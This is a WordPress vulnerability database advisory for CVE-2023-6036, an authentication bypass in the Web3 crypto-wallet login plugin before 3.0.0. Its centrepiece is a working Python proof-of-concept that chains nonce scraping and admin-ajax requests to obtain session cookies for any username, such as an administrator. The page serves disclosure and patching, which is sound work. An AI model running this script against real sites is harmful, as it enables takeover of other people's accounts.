WordPress Plugin Vulnerabilities

Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass

Description

The plugin is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

Proof of Concept

Run the following Python script:

```
import requests
import re

URL_BASE = "http://localhost:8083"
LOGIN_PATH="/wp-login.php"
USERNAME = "admin"

def get_login_page():
    response = requests.get(f"{URL_BASE}/wp-login.php")
    nonce = extract_nonce(response.text)
    return response.cookies, nonce

def extract_nonce(html_content):
    pattern = r'\"wp_nonce\":\"(.*?)\"'
    match = re.search(pattern, html_content)
    if match:
        print("Website nonce:", match.group(1))
        return match.group(1)
    else:
        raise ValueError("Nonce not found in the HTML content.")

def post_data(cookies, nonce):
    headers = {
    }

    data = {
        "action": "type_of_request",
        "request": "login",
        "address": USERNAME,
        "mo_web3_verify_nonce": nonce
    }

    response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies)
    random_string = extract_random_string(response.text)
    return random_string

def extract_random_string(response_content):
    pattern = r'Random string: (\w+)'
    match = re.search(pattern, response_content)
    if match:
        print("User nonce:", match.group(1))
        return match.group(1)
    else:
        raise ValueError("Random string not found in the response content.")

def post_with_random_string(cookies, nonce, random_string):
    headers = {
    }

    data = {
        "address": USERNAME,
        "nonce": random_string,
        "mo_web3_hiddenform_nonce": nonce
    }

    response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies, allow_redirects=False)
    return response.cookies

def print_cookies(cookies_jar):
    for cookie in cookies_jar:
        print(f"{cookie.name}: {cookie.value}")

def main():
    cookies, nonce = get_login_page()
    random_string = post_data(cookies, nonce)
    new_cookies = post_with_random_string(cookies, nonce, random_string)
    print("----------------")
    print("Cookies:")
    print_cookies(new_cookies)

if __name__ == "__main__":
    main()
```

Affects Plugins

Plugin icon
web3-authentication
Fixed in 3.0.0

References

CVE
CVE-2023-6036

Classification

Type
AUTHBYPASS
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher
vicent ribas
Submitter
vicent ribas
Submitter website
https://blog.pctripsesp.com
Submitter twitter
pctripsesp
Verified
Yes
WPVDB ID
7f30ab20-805b-422c-a9a5-21d39c570ee4

Timeline

Publicly Published
2024-01-17 (about 3 months ago)
Added
2024-01-17 (about 3 months ago)
Last Updated
2024-01-17 (about 3 months ago)

Other

Published
Title
Published
2014-08-01
Title
WordPress 3.7.1 & 3.8 - Cleartext Admin Credentials Disclosure
Published
2015-04-15
Title
Profile Builder < 2.1.4 - Missing Access Controls
Published
2013-03-24
Title
Backupbuddy - importbuddy.php Direct Request Remote Backup File Disclosure
Published
2019-07-05
Title
WP Like Button < 1.6.4 - Auth Bypass
Published
2020-01-14
Title
Backup and Staging by WP Time Capsule < 1.21.16 - Authentication Bypass